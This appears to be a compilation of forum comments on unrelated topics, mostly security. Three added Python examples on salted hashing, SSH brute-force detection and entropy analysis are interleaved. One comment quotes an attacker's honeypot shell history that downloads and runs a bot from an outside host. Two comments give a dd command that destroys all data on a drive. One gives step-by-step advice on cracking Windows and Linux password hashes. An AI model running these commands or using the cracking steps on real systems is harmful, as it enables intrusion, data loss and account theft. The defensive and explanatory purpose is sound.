The sky is huge. Most supernovas we survive are going to be very far away and are not very bright from our point of view. Therefore you need a big telescope to collect enough light to see them. The bigger the telescope is, the more of a minimum magnification level you'll have. Therefore you'll only be able to see a small fraction of a percentage of the sky at a time. Projects that survey the entire sky (e.g. those that look for asteroids) can take several months with just one telescope. Most large ground based telescope installations are dedicated to various research projects, usually studying one area of the sky. Not all of them can operate all the time due to weather. Until we have a large array of telescopes in space, it's unlikely we'll be able to constantly monitor the entire sky at any magnitude level enough to catch one-off events like this. So therefore, amateur astronomy is still important.
I'm sure they were encrypted. AES-256 is a symmetric encryption algorithm. The key has to be stored somewhere, many times in the same database the credit card numbers are being stored. How else would the credit card numbers get stored to the database in the first place? If they got system level access (which from what they are saying, it sounds like they did...), I'm sure they have encryption keys as well.
If they don't store them plaintext, they still have to store a hash (MD5, SHA2, etc...). If they know the hash algorithm (which I'm sure they do if they got DB access), they could easily run a brute force attack on the hashes that will crack any weak passwords (which I'm sure many are).
Even password hashes on Linux systems can be cracked if the passwords are weak and the attacker has time. See http://www.openwall.com/john/.
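The two comments above make the same point from the defender's side: an unsalted, fast hash (MD5, plain SHA-2) lets one guess be compared against every row of a dumped table and exposes which users share a password, while a salted, iterated hash makes the work per user and per iteration. The following Python is an added illustration, not code from the thread; the user names, passwords and iteration count are constructed for the example.

```python
import hashlib
import hmac
import os
from typing import Dict, List, Optional, Set

# Work factor for the salted scheme (assumed value for the example). Tune it
# so one verification costs roughly 100 ms on the server that has to do it.
ITERATIONS = 200_000


def hash_unsalted(password: str) -> str:
    """The scheme the thread warns about: one fast, unsalted digest per password.
    Two users with the same password get the same hash, and one guess can be
    compared against every row of a dumped table."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_salted(password: str, salt: Optional[bytes] = None,
                iterations: int = ITERATIONS) -> str:
    """Salted, iterated PBKDF2-HMAC-SHA256, stored as 'iterations$salt$digest'
    so the parameters travel with the hash and can be raised later."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_salted(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


def shared_password_groups(table: Dict[str, str]) -> List[Set[str]]:
    """Groups of users whose stored hashes are identical. With unsalted hashes
    this is visible to anyone holding the dump; with per-user salts it is not."""
    by_hash: Dict[str, Set[str]] = {}
    for user, h in table.items():
        by_hash.setdefault(h, set()).add(user)
    return [users for users in by_hash.values() if len(users) > 1]


def hash_ops_to_test_wordlist(n_users: int, wordlist_size: int,
                              salted: bool, iterations: int = 1) -> int:
    """Primitive hash invocations needed to try a wordlist against every user.
    Unsalted: each word is hashed once and compared to all rows. Salted and
    iterated: the work is per user and multiplied by the iteration count."""
    if not salted:
        return wordlist_size
    return n_users * wordlist_size * iterations


# Constructed sample: a dumped table of unsalted MD5 hashes for hypothetical
# users (not data from the thread).
UNSALTED_TABLE = {
    "alice": hash_unsalted("password123"),
    "bob": hash_unsalted("letmein"),
    "carol": hash_unsalted("password123"),
}


if __name__ == "__main__":
    print("users sharing a password:", shared_password_groups(UNSALTED_TABLE))
    stored = hash_salted("correct horse battery staple")
    print("salted verify:", verify_salted("correct horse battery staple", stored))
    print("ops, 1000 users x 10k words, unsalted MD5:",
          hash_ops_to_test_wordlist(1000, 10_000, salted=False))
    print("ops, same, salted PBKDF2:",
          hash_ops_to_test_wordlist(1000, 10_000, salted=True, iterations=ITERATIONS))
```

The last two numbers are the practical difference: against an unsalted table a ten-thousand-word list costs ten thousand digests no matter how many users there are, whereas with per-user salts and 200,000 iterations the same list costs two trillion primitive operations, which is the whole point of choosing a slow, salted construction over a bare MD5 or SHA-2.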
I'd use "dd if=/dev/urandom of=/dev/sda". Urandom is slower but better.
If you have access to dd, you probably have access to shred. It makes several passes using different patterns (25 by default), and has the option of zeroing the drive on the last pass. I believe it meets DOD standards. I'm not sure how effective it is with slack space, which often holds recoverable data even after running utilities that are supposed to wipe data off drives, but dd wouldn't be any better.
Shred works on a filesystem level to delete individual files on the drive. Worse than that, it only works on a subset of filesystems (primarily Linux and Unix based).
You want something that wipes *everything* from the drive, no matter what the filesystem is. dd, or dcfldd (which is what I prefer to use) does a sector by sector copy of data from a source to a destination. So the following command:
dd if=/dev/urandom of=/dev/sda
Will effectively fill the hard drive with random data, making any data recovery impossible.
I've listened to NPR yesterday about this, and the best experts have been able to say so far is that it is cyber VANDALISM. No major infrastructure has been crashed. Hospitals and such have not been imploded.
Who's to say they can't break into systems that control infrastructure or break into systems that are running in hospitals?
Do you think SCADA systems are invulnerable, and are totally separated from the internet? You think critical life support systems running Windows are totally separated from the outside world?
Before you do anything, I'd make an image of all his computers, before doing anything with them. Just in case you accidentally delete something, you're not gonna have a chance to get that data back.
The best way to work with his machine (although this may not be entirely practical) is by mounting the image through a write block device. This will prevent any data from being written to his hard disk. I'd also image the drive using the write block device. You can purchase a write block device, or if you can't afford it, just use Linux when mounting the drives and make sure you mount them read only.
With regards to his Linux machine, just make sure you don't clear his password hash to login. A lot of people use the same password for their machine that they use on their online accounts. You should be able to use a tool like John the Ripper to crack his Linux passwords. If he used a Windows machine, it's a simple matter of dumping the LM hashes from the SAM file (if he was using Windows XP) and sending them through some rainbow tables. Since LM hashes are limited to under 7 characters, you should be able to crack it using a good set of rainbow tables in a few minutes (you can either purchase these online, or download them. You'll want a table that has a decent character set like Alpha-Numeric-Symbol-14-Space). Or you can just brute force it, and it should take under two weeks on a decently fast machine.
Also, on any machine (Linux or Windows), just look around. See if there are any files that have his passwords stored. Look at his web browser. Check the history, and see what sites he's been to. Firefox or IE might have stored his passwords, in which case they can be easily recovered.
Also, for Windows there's a "protected storage" area in the registry that stores lots of passwords. There are lots of tools that can read this and dump its contents.
Just remember, you don't want to alter or delete any of the contents on his hard disk. You just want to examine them, and see what you can learn.
If all else fails, just get a court order and send off a password reset request...
First of all, ophcrack only comes with alpha-numeric tables for LM hashes. If you have special characters in your password, you'll have to generate your own table, which takes a very long time, and a lot of hard drive space. Ophcrack does not have the ability to generate Rainbow tables as the article suggests...
Second of all, Ophcrack only works well against LM hashes, because with LM hashes, passwords are split into 7 byte halves, then hashed. So you only have to have tables that go up to 7 characters with LM hashes.
If you disable LM hashes on your Windows box, and use NTLM hashes, the entire password is hashed, and is not split up. So if you pick a good password, with special characters, that's fairly long, it will be pretty much impossible to crack if you're using NTLM only. Even with rainbow tables...
The problem is Windows XP (by default) stores passwords as LM and NTLM hashes. So if an attacker can get the LM hashes, they can crack your password easily. You can hack the registry and keep Windows from storing LM hashes. See http://support.microsoft.com/kb/299656
There are several mathematical metrics to evaluate randomness. Hell, there is even a FIPS publication (Federal Information Processing Standards) that covers a set of tests that are intended to show a data set is random. http://csrc.nist.gov/cryptval/140-1/1401test.pdf
Any chance you can share what attack vector they used to root your system? Sure, poor passwords on user accounts. They just brute force usernames and passwords on the SSH server until they get in. While there are a number of methods to prevent this vector of attack (deny hosts, better password policy), most users don't bother to implement them.
For instance, here's a recent attack on my honeypot (running Slackware Linux):
root@zomg:~# cat /home/webmaster/
./ .bash_history .ssh/ ../ .screenrc .xsession
root@zomg:~# cat /home/webmaster/.bash_history
ssh localhost
w
cat /etc/hosts
cat /proc/cpuinfo
passwd
cd /var/tmp
ks
l
sl
ls
ls- all
ls -all
mkdir " "
cd " "
clear
wget imaginez0r.xhost.ro/botme.tar.gz
tar zxvf botme.tar.gz
rm -rf botme.tar.gz
cd .bot/
PATH=.:$PATH
bash
These kinds of attacks happen every day, sometimes more than once a day. If you don't patch and secure your machine, or do stupid things like download and run binaries, it's gonna get owned. Doesn't matter what OS you run.
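The honeypot comment above describes the usual sequence: a burst of SSH password failures from one address, then a successful password login from the same address, followed by the bot download. DenyHosts-style tools catch the first half; the second half is what turns noise into an incident. The Python below is an added example, not the commenter's code or the honeypot's real log: it parses constructed OpenSSH auth.log lines (hypothetical host name, users and documentation-range IPs), flags an address once it passes a failure threshold inside a time window, and reports any login that later succeeds from a flagged address.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# Constructed sample auth.log excerpt (hypothetical host, users and IPs from
# documentation ranges); it is not the honeypot's real log. It shows the
# pattern from the thread: a burst of password failures from one address,
# then a successful password login from the same address.
SAMPLE_AUTH_LOG = """\
Mar  3 02:14:01 zomg sshd[4312]: Failed password for invalid user admin from 192.0.2.45 port 51022 ssh2
Mar  3 02:14:03 zomg sshd[4314]: Failed password for invalid user oracle from 192.0.2.45 port 51030 ssh2
Mar  3 02:14:05 zomg sshd[4316]: Failed password for root from 192.0.2.45 port 51041 ssh2
Mar  3 02:14:07 zomg sshd[4318]: Failed password for invalid user test from 192.0.2.45 port 51050 ssh2
Mar  3 02:14:09 zomg sshd[4320]: Failed password for webmaster from 192.0.2.45 port 51063 ssh2
Mar  3 02:14:12 zomg sshd[4322]: Accepted password for webmaster from 192.0.2.45 port 51070 ssh2
Mar  3 02:20:40 zomg sshd[4400]: Failed password for alice from 198.51.100.7 port 40022 ssh2
Mar  3 02:20:55 zomg sshd[4402]: Accepted publickey for alice from 198.51.100.7 port 40023 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

FAIL_THRESHOLD = 5                   # failures from one address ...
FAIL_WINDOW = timedelta(minutes=5)   # ... within this window trips the alarm


def parse_line(line: str, year: int = 2009) -> Optional[dict]:
    """Parse one sshd auth.log line; syslog lines carry no year, so it is supplied."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime("%d %s" % (year, m["ts"]), "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text: str, threshold: int = FAIL_THRESHOLD,
                      window: timedelta = FAIL_WINDOW
                      ) -> Tuple[Dict[str, datetime], List[Tuple[str, str, str]]]:
    """Return (flagged, compromised): addresses that crossed the failure
    threshold inside the window, with the time they did, and every login that
    later succeeded from a flagged address as (ip, user, method)."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    events.sort(key=lambda e: e["ts"])
    recent_failures: Dict[str, List[datetime]] = defaultdict(list)
    flagged: Dict[str, datetime] = {}
    compromised: List[Tuple[str, str, str]] = []
    for e in events:
        ip = e["ip"]
        if e["result"] == "Failed":
            q = recent_failures[ip]
            q.append(e["ts"])
            while q and e["ts"] - q[0] > window:   # drop failures outside the window
                q.pop(0)
            if len(q) >= threshold and ip not in flagged:
                flagged[ip] = e["ts"]
        elif ip in flagged:
            # A success after a burst is the real incident, not just noise.
            compromised.append((ip, e["user"], e["method"]))
    return flagged, compromised


if __name__ == "__main__":
    flagged, compromised = detect_bruteforce(SAMPLE_AUTH_LOG)
    for ip, when in flagged.items():
        print("block %s (threshold crossed at %s)" % (ip, when))
    for ip, user, method in compromised:
        print("INCIDENT: %s logged in as %s via %s after a brute-force burst" % (ip, user, method))
```

Run against a live log, the flagged addresses are what you would feed into hosts.deny or a firewall rule; the compromised list is the one to act on by hand, because by then the attacker is already inside and the .bash_history above is what comes next. The single failure from 198.51.100.7 followed by a key-based login stays below the threshold, which is the usual shape of a legitimate user mistyping a passphrase.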
If they can't afford a $200 operating system, they shouldn't be using it. Maybe if piracy wasn't so easy, more people would be forced to move to another operating system like Linux. Instead, people decide that it's easier to steal. Microsoft owns the software. They can charge however much they want, and they have the right to protect their software from piracy. They're doing a very good job at it, and I applaud their efforts.
When you write text on a forum like Slashdot every minute you spend writing translates into thousands of minutes of reading. People would do well to remember that.
I'm sick of wasting thousands of minutes reading posts about bad spelling and grammar...
1. MS Exchange/Active Directory
2. A cobbled-together solution based as much as possible on OSS (as no direct equivalent exists).
The choices are actually:
1. MS Exchange/Active Directory - quick, easy, and cheap.
2. Shell out a lot of money for something else.
3. Have a headache "trying" to set up something similar with OSS.
Yes it does. From Google's Privacy Center (http://www.google.com/terms_of_service.html):
Personal Use Only
The Google Services are made available for your personal, non-commercial use only. You may not use the Google Services to sell a product or service, or to increase traffic to your Web site for commercial reasons, such as advertising sales. You may not take the results from a Google search and reformat and display them, or mirror the Google home page or results pages on your Web site. You may not "meta-search" Google. If you want to make commercial use of the Google Services, you must enter into an agreement with Google to do so in advance. Please contact us for more information.
Seems like an obvious error from a statistical analysis standpoint. Makes me wonder how much critical medical research has obvious errors like this.
Sure, there are metrics to evaluate randomness. One of the most common methods is entropy (http://en.wikipedia.org/wiki/Information_entropy). It can be used to calculate the "randomness" of data. It works so well that forensics people use it to carve files on hard disk (used to find a continuous stream of non-random data among random data). http://www.korelogic.com/Resources/Presentations/ceic_2007_advanced_file_carving_with_ftimes_final.pdf
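The two randomness comments (the FIPS test suite and the entropy-based carving idea above) are easy to make concrete. The Python below is an added example, not code from the thread or from the linked presentation: Shannon entropy per byte, the FIPS 140-1 monobit test with the bounds the publication gives (9,654 < X < 10,346 ones in 20,000 bits), and a block scan that returns the low-entropy ranges in a constructed "disk image" made of deterministic pseudo-random fill around a stretch of plain text. The block size, threshold and sample contents are assumptions chosen for the example.

```python
import math
import random
from collections import Counter
from typing import List, Tuple


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte: 0.0 for a constant
    run, 8.0 for a perfectly uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def monobit_test(stream: bytes) -> Tuple[int, bool]:
    """FIPS 140-1 monobit test: count the ones in the first 20,000 bits of the
    stream; the test passes when 9654 < X < 10346 (the publication's bounds)."""
    needed = 20000 // 8
    if len(stream) < needed:
        raise ValueError("need at least %d bytes" % needed)
    ones = sum(bin(b).count("1") for b in stream[:needed])
    return ones, 9654 < ones < 10346


def low_entropy_regions(data: bytes, block_size: int = 512,
                        threshold: float = 6.0) -> List[Tuple[int, int]]:
    """The carving idea from the thread: scan fixed-size blocks and return the
    [start, end) byte ranges whose entropy is below the threshold, i.e. the
    structured (file-like) data sitting among random or encrypted fill."""
    regions: List[Tuple[int, int]] = []
    start = None
    for off in range(0, len(data), block_size):
        if shannon_entropy(data[off:off + block_size]) < threshold:
            if start is None:
                start = off
        elif start is not None:
            regions.append((start, off))
            start = None
    if start is not None:
        regions.append((start, len(data)))
    return regions


def _prng_bytes(n: int, seed: int) -> bytes:
    """Deterministic pseudo-random fill so the sample is reproducible (a
    stand-in for wiped or encrypted space, not a CSPRNG)."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed sample "disk image": 4 KiB of random fill, 2 KiB of plain text
# (a repeated hypothetical HTTP request line), then 4 KiB of random fill.
RANDOM_FILL = _prng_bytes(4096, seed=1)
TEXT_REGION = (b"GET /index.html HTTP/1.0\r\n" * 80)[:2048]
SAMPLE_IMAGE = RANDOM_FILL + TEXT_REGION + _prng_bytes(4096, seed=2)


if __name__ == "__main__":
    print("entropy of random fill: %.2f bits/byte" % shannon_entropy(RANDOM_FILL))
    print("entropy of text region: %.2f bits/byte" % shannon_entropy(TEXT_REGION))
    print("low-entropy regions (carve candidates):", low_entropy_regions(SAMPLE_IMAGE))
    ones, ok = monobit_test(RANDOM_FILL)
    print("monobit: %d ones in 20,000 bits -> %s" % (ones, "pass" if ok else "FAIL"))
    print("monobit on all-zero stream:", monobit_test(bytes(2500)))
```

Two caveats worth keeping in mind when using this for real: a 512-byte block can never reach the full 8 bits per byte (there are not enough samples for every byte value to appear equally), so the carving threshold has to sit well below 8, and compressed or encrypted files look exactly like random fill to an entropy scan, which is why the linked presentation pairs entropy with other signatures rather than using it alone.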
Will the real IP address please stand up?
If you don't know why the hell you're voting, you're like me, your choices are all equally terrible.
This ant reminds me of some girls I know...
While I know Superman is invincible, I never understood how his clothes never got damaged. Are they imported from another planet?
Ahh, they're just too lazy to get up and draw their own... We all know that feeling....
"All your base are belong to us."
ThinkGeek sells an "office safe" version of this:
http://www.thinkgeek.com/cubegoodies/toys/71bc/M/
What if you run out of yellow ink?
What a nice paradox this story presents. "I am lying."
TV filtering already exists. It's called V-Chip technology.